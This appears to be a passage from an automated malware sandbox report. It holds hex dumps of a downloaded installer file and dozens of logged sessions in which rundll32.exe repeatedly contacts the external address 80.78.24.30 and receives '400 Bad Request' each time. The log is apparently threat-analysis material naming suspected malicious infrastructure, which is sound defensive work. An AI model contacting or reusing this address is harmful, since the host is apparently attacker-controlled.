                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586381912 CEST1236INData Raw: 20 00 00 00 21 00 00 00 62 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 2b 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 31 00 00 00 32 00 00 00 33 00 00 00 34 00
                                                                                                                                                                                                                                                    Data Ascii: !b#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586433887 CEST1236INData Raw: 8c 00 8e 00 01 00 6e 00 60 00 bd 00 bf 00 5a 00 50 00 62 00 63 00 66 00 ca 00 6e 00 30 00 cd 00 83 00 67 00 01 00 68 00 c2 00 c4 00 57 00 98 00 9f 00 6c 00 5a 00 50 00 57 00 98 00 06 00 07 00 57 00 98 00 9f 00 a1 00 07 00 a4 00 67 00 22 00 06 00
                                                                                                                                                                                                                                                    Data Ascii: n`ZPbcfn0ghWlZPWWg"0ZyP7ZyP7ZyP67P"7H&&H&&H HHHH
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586450100 CEST1236INData Raw: 0a 09 00 00 0b 09 00 00 0c 09 00 00 0d 09 00 00 0e 09 00 00 0f 09 00 00 10 09 00 00 11 09 00 00 12 09 00 00 13 09 00 00 14 09 00 00 15 09 00 00 16 09 00 00 17 09 00 00 18 09 00 00 19 09 00 00 1a 09 00 00 1b 09 00 00 1c 09 00 00 1d 09 00 00 1e 09
                                                                                                                                                                                                                                                    Data Ascii: !"#$%&'()*+-.203@456789:;<=>?
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586464882 CEST1236INData Raw: 6f 6e 73 20 61 72 65 20 74 6f 20 62 65 20 65 78 65 63 75 74 65 64 2e 20 20 4c 65 61 76 65 20 62 6c 61 6e 6b 20 74 6f 20 73 75 70 70 72 65 73 73 20 61 63 74 69 6f 6e 2e 41 64 6d 69 6e 55 49 53 65 71 75 65 6e 63 65 4f 70 74 69 6f 6e 61 6c 20 65 78
                                                                                                                                                                                                                                                    Data Ascii: ons are to be executed. Leave blank to suppress action.AdminUISequenceOptional expression which skips the action if evaluates to expFalse.If the expression syntax is invalid, the engine will terminate, returning iesBadActionData.TextStyleSize
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586482048 CEST1236INData Raw: 6e 6b 65 64 20 74 6f 20 74 68 69 73 20 63 6f 6e 74 72 6f 6c 2e 20 4b 65 79 50 61 74 68 46 69 6c 65 3b 52 65 67 69 73 74 72 79 3b 4f 44 42 43 44 61 74 61 53 6f 75 72 63 65 45 69 74 68 65 72 20 74 68 65 20 70 72 69 6d 61 72 79 20 6b 65 79 20 69 6e
                                                                                                                                                                                                                                                    Data Ascii: nked to this control. KeyPathFile;Registry;ODBCDataSourceEither the primary key into the File table, Registry table, or ODBCDataSource table. This extract path is stored when the component is installed, and is used to detect the presence of th
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586790085 CEST1236INData Raw: 72 64 65 72 41 20 70 6f 73 69 74 69 76 65 20 69 6e 74 65 67 65 72 20 75 73 65 64 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 74 68 65 20 6f 72 64 65 72 69 6e 67 20 6f 66 20 74 68 65 20 69 74 65 6d 73 20 77 69 74 68 69 6e 20 6f 6e 65 20 6c 69 73 74
                                                                                                                                                                                                                                                    Data Ascii: rderA positive integer used to determine the ordering of the items within one list. The integers do not have to be consecutive.The visible text to be assigned to the item. Optional. If this entry or the entire column is missing, the text is th
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586806059 CEST1224INData Raw: 20 74 6f 20 63 68 61 6e 67 65 2e 4e 61 6d 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 20 54 68 69 73 20 6e 61 6d 65 20 6d 75 73 74 20 62 65 20 75 6e 69 71 75 65 20 77 69 74 68 69 6e 20 61 20 64 69 61 6c 6f 67 2c 20 62 75 74 20 63 61 6e 20
                                                                                                                                                                                                                                                    Data Ascii: to change.Name of the control. This name must be unique within a dialog, but can repeat on different dialogs. The type of the control.XHorizontal coordinate of the upper left corner of the bounding rectangle of the control.WidthWidth of the b
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586823940 CEST1236INData Raw: 20 62 79 20 74 68 65 20 66 69 72 73 74 20 74 77 6f 20 65 6e 74 72 69 65 73 2e 41 72 67 75 6d 65 6e 74 41 20 76 61 6c 75 65 20 74 6f 20 62 65 20 75 73 65 64 20 61 73 20 61 20 6d 6f 64 69 66 69 65 72 20 77 68 65 6e 20 74 72 69 67 67 65 72 69 6e 67
                                                                                                                                                                                                                                                    Data Ascii: by the first two entries.ArgumentA value to be used as a modifier when triggering a particular event.A standard conditional statement that specifies under which conditions an event should be triggered.OrderingAn integer used to order several
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.591295958 CEST1236INData Raw: 72 6d 69 74 74 65 64 41 20 74 65 78 74 20 73 74 72 69 6e 67 20 73 70 65 63 69 66 79 69 6e 67 20 74 68 65 20 74 69 74 6c 65 20 74 6f 20 62 65 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 74 69 74 6c 65 20 62 61 72 20 6f 66 20 74 68 65 20
                                                                                                                                                                                                                                                    Data Ascii: rmittedA text string specifying the title to be displayed in the title bar of the dialog's window.Control_DefaultDefines the default control. Hitting return is equivalent to pushing this button.Control_CancelDefines the cancel control. Hitting


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.54970580.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.851995945 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.54970680.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497184992 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.54970980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.653912067 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.2.54971080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.315656900 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.2.54972380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085249901 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.2.54972580.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.717818975 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    7192.168.2.54974580.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424285889 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    8192.168.2.54975180.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.053459883 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    9192.168.2.54976980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.779593945 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    10192.168.2.54977580.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.460541010 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    11192.168.2.54978780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.170537949 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    12192.168.2.54979380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.826313972 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    13192.168.2.54982480.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:34.591407061 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    14192.168.2.54982780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:35.206974030 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    15192.168.2.54984280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:36.876251936 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    16192.168.2.54984480.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:37.537655115 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    17192.168.2.54985180.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:38.249438047 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    18192.168.2.54985780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:38.949831963 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    19192.168.2.54986380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:39.645021915 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    20192.168.2.54986980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.283513069 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    21192.168.2.54989780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.927695990 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    22192.168.2.54990380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635402918 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    23192.168.2.54991080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.334979057 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    24192.168.2.54991280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.972744942 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    25192.168.2.55002080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:04.503603935 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    26192.168.2.55002180.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:05.128961086 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    27192.168.2.55002380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.071758986 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    28192.168.2.55002480.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.698581934 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    29192.168.2.55002680.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.424710989 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    30192.168.2.55002780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062750101 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    31192.168.2.55002980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726120949 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    32192.168.2.55003080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728039026 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728935957 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    33192.168.2.55003280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428221941 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    34192.168.2.55003380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063258886 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    35192.168.2.55003680.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:33.963417053 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    36192.168.2.55003780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:34.617934942 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
